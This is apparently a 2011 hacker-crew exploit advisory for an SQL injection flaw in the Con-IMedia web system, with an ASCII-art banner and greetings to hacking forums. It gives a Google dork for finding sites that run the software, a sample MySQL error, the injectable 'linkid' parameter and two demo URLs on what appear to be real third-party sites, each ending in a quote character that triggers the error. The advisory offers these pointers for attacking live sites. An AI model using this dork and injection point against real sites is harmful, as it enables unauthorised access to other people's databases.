.___ __ .__ __| _/____ ____ ____ _____/ |_| |__ / __ |/ _ \ / \ / ___\ / _ \ __\ | \ / /_/ ( <_> ) | \/ /_/ > <_> ) | | Y \ \____ |\____/|___| /\___ / \____/|__| |___| / \/ \//_____/ \/#==#[A|B|H]#==# ================================================================ # Exploit Title : Con-IMedia SQL inj: vulnerable # Google Dork : "Powered By: Con-IMedia" # Date : 03-12-2011 # Author : nGa Sa Lu [ GaNgst3r ] # Tested on : Vista # Platform : php ================================================================ [+] Google Dork : "Powered By: Con-IMedia" [+] SQL Error Statement : Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /homepages/18/d158663934/htdocs/moneysystems/modules/mod_main.php on line 92 [+] http://www.localhost/index1.php?linkid=[SQL HERE] [+] Demo : http://www.gse.com.gh/index1.php?linkid=33' http://www.money-systems.net/index1.php?linkid=262' ################################################################################### x Greetz to all M1rT crew, h4ckall[dot]net, 4lbora4q[dot]com bros, hakforums.net, 1337day.com - ################################################################################### x-[+] i'am ####################################################################### -------------<< [ dongoth ] ^^ [ GaNgst3r ] ^^ [ nGa Sa Lu ] >>-------------------x ################################################################################### ===================================================================================